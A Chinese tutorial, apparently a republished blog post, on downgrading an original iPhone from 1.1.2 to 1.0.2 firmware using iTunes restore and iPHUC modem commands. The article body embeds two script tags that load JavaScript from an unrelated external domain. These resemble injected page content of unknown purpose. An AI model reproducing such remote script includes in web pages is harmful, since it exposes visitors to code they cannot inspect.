原生1.1.2固件iPhone降级至1.0.2教程

<script language='javascript' src='http://www.shiqiaotou.com/donetk/Header.js'></script>

适用机型:原生1.1.2固件的iPhone

破解流程:降级至1.0.2 → 降级Modem至03.14.08_G

说明:由于降级最后为1.0.2固件未激活状态,因此你也可以选择升级至1.1.1固件之后再进行破解。

IPHUC下载地址 1.0.2固件下载地址


以下是1.1.2固件降级详细教程:

  1.将iPhone连接至电脑,让iTunes识别出iPhone,然后将iPhone关机。

  2.现在请同时按住 home键 和 开关键达10秒钟后,松开开关键,继续按住home键,知道iTunes提示你进行iPhone恢复。这个步骤中,iPhone始终是黑屏状态的。

  3.按住键盘上的shift键,选择本机电脑上你已经下载好的1.0.2固件,然后点击确认后,iTunes将会开始进行恢复。

  4.恢复到最后的时候,iTunes会有错误提示,但这是正常的,也同时表示你的Version已经降至1.0.2了。

  5.解压缩IPHUC并安装,然后开启IPHUC,在其中输入以下命令:

  cmd setenv auto-boot true

  cmd saveenv

  cmd fsboot

  输入完上面的命令之后,iPhone的Modem Firmware就已经降级至03.14.08_G的Modem,那么现在你的iPhone就已经成功降级至1.0.2版的iPhone了。


文章来源于 http://iphone.tgbus.com 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值